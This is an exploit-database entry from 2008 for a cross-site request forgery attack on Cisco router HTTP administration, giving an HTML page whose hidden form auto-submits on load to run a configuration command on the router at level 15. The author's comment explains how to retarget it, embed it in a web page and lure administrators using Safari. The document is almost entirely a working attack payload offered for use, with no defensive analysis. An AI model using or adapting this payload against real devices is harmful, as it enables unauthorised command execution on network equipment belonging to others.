[] NeoSense

Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (2)

Author: Jeremy Brown
type: remote
platform: hardware
port: 
date_added: 2008-09-16 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]
     Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #2
     Replace "10.10.10.1" with the IP address of the target router, embed this in a web
     page and hope for the best. Cisco Admin's + Safari are the best targets ;) -->


<html>
<body>

<body onload="fdsa.submit();">



<form name=fdsa method="post" action="http://10.10.10.1/level/15/exec/-/configure/http">

<input type=hidden name=command value="alias exec xx xx">



<input type=hidden name=command_url     value="/level/15/exec/-">
<input type=hidden name=new_command_url value="/level/15/configure/-">

</body>
</html>

# milw0rm.com [2008-09-17]